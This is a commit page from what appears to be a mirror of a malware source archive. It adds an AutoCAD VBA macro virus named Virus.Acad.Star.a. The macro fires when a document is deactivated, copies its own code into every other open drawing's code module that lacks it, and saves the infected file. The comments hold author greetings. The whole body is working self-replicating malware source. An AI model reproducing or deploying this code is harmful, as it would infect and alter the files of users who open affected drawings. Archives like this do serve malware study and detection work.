mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Rename Star.acad to Virus.Acad.Star.a
This commit is contained in:
@@ -0,0 +1,21 @@
|
||||
Private Sub AcadDocument_Deactivate()
|
||||
Set VBEModel = VBE
|
||||
On Error GoTo runtonext
|
||||
For i = 1 To Documents.Count
|
||||
Set at = VBEModel.codepanes(i).codemodule
|
||||
If at.lines(2, 1) = "Set VBEModel = VBE" And terr = 0 Then
|
||||
newroutine = at.lines(1, at.countoflines)
|
||||
terr = 1
|
||||
i = 0
|
||||
End If
|
||||
If at.lines(2, 1) <> "Set VBEModel = VBE" And terr = 1 Then
|
||||
VBEModel.codepanes(i).codemodule.InsertLines 1, newroutine
|
||||
thisdocument.Save
|
||||
End If
|
||||
runtonext:
|
||||
Next i
|
||||
'[Autocad2k\Star]
|
||||
'[A.s.T]
|
||||
'Big Greetz to some0ne really special
|
||||
'"You`ll always be a star in my sky"
|
||||
End Sub
|
||||
Reference in New Issue
Block a user